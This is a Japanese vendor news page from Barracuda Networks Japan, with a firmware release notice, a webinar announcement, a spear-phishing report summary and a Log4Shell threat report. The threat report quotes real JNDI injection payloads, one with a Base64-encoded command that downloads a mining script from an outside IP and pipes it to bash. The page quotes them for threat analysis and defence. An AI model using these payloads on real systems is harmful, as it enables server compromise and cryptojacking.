お知らせ
Barracuda Web Application Firewall のファームウェア v16.0.011が2022年4月13日、GAリリースされました。メジャーバージョンv16.0の最初のリリースとなります。 本バージョンはシリアル番号1296614以上の機器にのみ、適用が可能となっております。シリアル番号1296614未満の機器では、引き続きv15.0.0.009が最新GAバージョンとなります。 新機能や修正点、アップデートにあたっての注意点は、リリースノートをご確認下さい。https://campus.barracuda.com/product/websecuritygateway/doc/9011724/release-notes また、本リリースに伴い、ファームウェアのサポート終了日情報も更新されております。詳しくは、以下をご確認下さいhttps://www.barracuda.co.jp/products/webfilter-tec/
開催概要 セミナー名 「CRN 2021 Products of the Year」の「Data Protection and Management」部門で総合優勝 ~Barracuda Cloud-to-Cloud Backupのご紹介~ 日時 2022年5月24日(火) 14:00~14:30 アジェンダ Microsoft 365のデータを保護するために、高速でスケーラブルかつ耐障害性に優れたバックアッププラットフォームを提供するBarracuda Cloud-to-Cloud Backupが、「CRN 2021 Products of the Year」の「Data Protection and Management」部門の総合優勝に選ばれました。 今回の受賞は、チャネルパートナーの皆様からのご意見に基づいているということで、弊社にとってさらに喜ばしいものです。 そこで本ウェビナーでは、Barracuda Cloud-to-Cloud Backupのどの点が優れていて、総合優勝に至ったか、等についてご紹介します。 また、バックアップとアーカイブを組み合わせることのメリットについても解説します。 Microsoft 365のデータを保護したいが、製品導入や操作性が難しいのではないかと不安な方、バックアップやアーカイブが本当に必要なのか、等お悩みの方はぜひお申込みください。 お申し込み 下記のフォームからお申し込みください。 お申込者にはセミナー開催日前日の 17:00 にオンラインセミナー用URLをお送りいたします。 お申込期限 2022年5月24日 14:00 セミナー資料 セミナー資料のダウンロードはこちら アーカイブ セミナー動画の視聴はこちら
中小企業が大企業に比べて3倍以上も狙われているという事実が明らかに クラウドファースト・セキュリティソリューションのリーディングプロバイダーであるBarracuda Networks, Inc.(本社:米国カリフォルニア州キャンベル)の日本法人、バラクーダネットワークスジャパン株式会社(東京都品川区、執行役員社長:大越大造、以下「バラクーダネットワークス」)は、本日、調査レポート「スピアフィッシング: 主要な攻撃と攻撃トレンド Vol. 7 – 最新のソーシャルエンジニアリングの戦術と複雑化する攻撃に関する見解」と題したレポートを発表しました。本レポートは、スピアフィッシングの現在の傾向、標的となりやすい企業、被害者の防御をすり抜けるために攻撃者が使っている新たな手口、侵害されている多くのアカウントの状況などを紹介しています。 レポート(日本語版)のダウンロードはこちら https://f.msgs.jp/webapp/form/16370_qfy_84/index.do ハイライト: 従業員100人未満の中小企業の平均的な従業員は、大企業の従業員よりも350%多くソーシャルエンジニアリング攻撃を受ける。 サイバー犯罪者は12,000の漏洩したアカウントから300万通のメッセージを送信した。 2021年、5社に1社のアカウントが侵害された。 サイバー犯罪者は、2021年に約50万件のMicrosoft Office 365アカウントを侵害した。 図1. 組織ごとの平均ソーシャルエンジニアリング攻撃数 攻撃者の行動の詳細 バラクーダの調査員は、2021年1月から2021年12月にかけて、数千社に及ぶ企業の数百万通のメールを分析しました。主な調査結果は下記の通りです。 従業員100人未満の中小企業の平均的な従業員は、大企業の従業員よりも350%多くソーシャルエンジニアリング攻撃を受けています。 会話乗っ取りは、2021年に約270%増加しています。 ソーシャルエンジニアリング攻撃の51%は、フィッシングです。 フィッシング攻撃の57%に利用され、最もなりすまされているブランドはMicrosoftです。 2021年、5社に1社のアカウントが侵害されました。 サイバー犯罪者は、2021年に約50万件のMicrosoft Office 365アカウントを侵害しました。 不正アクセスされたアカウントへの悪質なログインの3件に1件は、ナイジェリアからとなっています。 サイバー犯罪者は12,000の漏洩したアカウントから300万通のメッセージを送信しています。 図2. なりすましに遭ったブランドのトップ10 Barracuda本社Email Protection部門のSVPエンジニアである、Don MacLennanは、次のように述べています。「中小企業はリソースが少なく、セキュリティの専門知識も不足していることが多いため、スピアフィッシング攻撃に弱く、サイバー犯罪者はこれを利用しています。だからこそ、あらゆる規模の企業にとって、テクノロジーとユーザー教育の両面から、セキュリティへの投資を見落とさないことが重要なのです。侵入やアカウントの漏洩による損害は、さらに大きなものとなります。」 関連リンク: スピアフィッシング:主要な攻撃と攻撃トレンド Vol. 7 – 最新のソーシャルエンジニアリングの戦術と複雑化する攻撃に関する見解(日本語版) https://f.msgs.jp/webapp/form/16370_qfy_84/index.do ブログ「スピアフィッシングレポート:ソーシャルエンジニアリングと複雑化する攻撃」 https://www.barracuda.co.jp/spear-phishing-report-social-engineering-and-growing-complexity-of-attacks 過去のレポート スピアフィッシング:主要な攻撃と攻撃トレンド~攻撃者の進化した戦術と標的となる人物に関する洞察~(2021年7月、Vol. 6) https://www.barracuda.co.jp/download/spearphishingreport-vol6-jp/ スピアフィッシング: 主要な攻撃と攻撃トレンド ~進化する攻撃を防止するベストプラクティス~(2020年12月、Vol. 5) https://www.barracuda.co.jp/download/spearphishingreport-vol5-jp/ スピアフィッシング:主要な攻撃と攻撃トレンド 〜侵害されたメールアカウントにおける攻撃者の振る舞いに関する分析〜(2020年7月、Vol. 4) https://www.barracuda.co.jp/download/spearphishingreport-vol4/ スピアフィッシング:主要な攻撃と攻撃トレンド~BEC(ビジネスメール詐欺)攻撃の防止~(2019年11月 Vol.3) https://www.barracuda.co.jp/download/spear-phishing-report-vol3/ スピアフィッシング:主要な攻撃と攻撃トレンド~メールアカウント乗っ取り攻撃:ラテラルフィッシング攻撃の防止~(2019年8月 Vol.2) https://www.barracuda.co.jp/download/spear_phishing_report_august2019_vol2/ スピアフィッシング:主要な攻撃と攻撃トレンド~高度化する攻撃を防止するベストプラクティス~(2019年3月 Vol.1) https://www.barracuda.co.jp/download/fishing/ E book : 今すぐ知っておくべき13タイプのメール攻撃~高度化する攻撃をメールボックス保護によって防止する方法~ https://www.barracuda.co.jp/download/gbl-glbl-202004-ebook-13-email-threats/ 【本件に関するお問い合わせ】...
日本のIPアドレスからの攻撃が、米国に次いで多いことが判明 クラウドファースト・セキュリティソリューションのリーディングプロバイダーであるBarracuda Networks, Inc.(本社:米国カリフォルニア州キャンベル)の日本法人、バラクーダネットワークスジャパン株式会社(東京都品川区、執行役員社長:大越大造、以下「バラクーダネットワークス」)は、本日、「バラクーダの注目する脅威:Log4Shell脆弱性を狙った攻撃」について、調査結果を発表しました。 ハイライト: Log4jの脆弱性「Log4Shell」を利用した攻撃の量は、過去2か月間にわずかな減少や急増が見られるものの、比較的一定。今後もこの攻撃パターンが続くと予想される。 攻撃の大半(83%)は米国のIPアドレスからで、次いで日本(10%)、ドイツ、オランダ、ロシアからも攻撃が送られている。 図1: Log4jの脆弱性を狙った攻撃の比率 詳細: 今回、バラクーダの調査担当者は、2021年12月10日以降にバラクーダのシステムで検出された攻撃とペイロードを分析しました。Log4jのLog4Shellと呼ばれる脆弱性については、大々的に報道される2ヶ月以上前から知られていますが、今回の調査分析によると、これらの脆弱性を利用した攻撃の量は、過去2か月間にわずかな減少や急増が見られるものの、比較的一定であることが判明しました(図1)。このライブラリは広範囲で利用されていること、脆弱性悪用の可能性、侵害による報酬を考えると、少なくとも短期的には、この攻撃パターンが続くと予想されます。 これらの脆弱性を狙った攻撃の量は依然として安定していますが、攻撃の発生源について、当社の研究者が興味深い見解を示しました。攻撃の大半(83%)は米国のIPアドレスからで、その半数はAWS、Azure、その他のデータセンターに関連するものでした。また、日本(10%)、ドイツ、オランダ、ロシアからも攻撃が送られていました(図2)。なお、これらはスキャンを実行し、侵入を試みたIPです。実際のペイロードは、攻撃が成功した場合、他の侵害されたWebサイトやVPSホストから配信されます。ペイロードを配信するこれらのIPは、通常、以下の例で説明するBase64エンコーディングを使って難読化されています。 図2:攻撃者のIPアドレス ペイロードの例: この数ヶ月の間に、これらの脆弱性を悪用しようとしたペイロードの例を下記に紹介します。最初のものは、比較的穏やかな(あるいは、見方によっては非常に迷惑な)ペイロードとなります。調査の結果、これはJavaのペイロードであることが判明しました。このペイロードのYouTube動画では、Rick Astleyの曲「Never Gonna Give You Up」 が再生されます(図3)。 borchuk/3.1${jndi:ldap://-.-.-.-:1389/o=reference,payload=itzbenz.payload.RickRoll} 図3:ペイロード例1 2つ目の例は、脆弱性が顕在化した当初に多く見られた、暗号資産「Monero」のマイニングペイロードです。このペイロードは、複数の異なるIPから出現し、通常、コマンドはbase64で難読化されています。このURLの実際のペイロードは、マイニングをセットアップする下記図のようなスクリプトとなっています。 ${jndi:ldap://-.-.-.-:1389/Deserialization/CommonsCollectionsK2/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" 図4:ペイロード例2 その他、Contiランサムウェアグループが、Log4Shellを利用してVMwareのインストールを侵害しようとしている例も見受けられます。 ペイロードからの保護方法: Log4Shellから保護する最善の方法は、Log4jの最新バージョンへのアップグレードです。ソフトウェアやライブラリを最新の状態に維持し、脆弱性のパッチが適時適用されるようになります。Web アプリケーションで発見される脆弱性数の増加により、攻撃からの保護が次第に複雑になっています。しかし、これらの脆弱性が原因で悪用されないように、Webアプリケーションを保護するオールインワンのソリューションが提供されるようになりました。 Web Application and API Protection (WAAP) サービスとも呼ばれる、WAF/WAF-as-a-Service ソリューションは、最新のセキュリティソリューションをすべて提供する使い勝手の良い製品で、Web アプリケーションを保護することができます。 関連リンク: 市場レポート「2021年のアプリケーションセキュリティの状況」(日本語訳) https://www.barracuda.co.jp/download/appsecreport-final/ Barracuda WAF-as-a-Serviceの詳細 https://www.barracuda.co.jp/products/waf-as-a-service/ バラクーダネットワークスについて 米国Barracuda Networks Inc. の日本法人。ITにまつわる課題をメール保護、ネットワークとアプリのセキュリティ、データ保護の3つの分野において、効率的かつ低コストで業界最高レベルのソリューションを提供しています。バラクーダネットワークス製品は全世界20万社以上のお客様にご利用いただいており、オンプレミス、仮想、クラウド、そしてハイブリッドといった柔軟な導入形態により、あらゆるIT環境で最適化できるよう設計されています。 【本件に関するお問い合わせ】 〒141-0031東京都品川区西五反田8-3-16 西五反田8丁目ビル5階 バラクーダネットワークスジャパン株式会社 E-mail: jsales@barracuda.co.jp TEL: 050-1791-0524
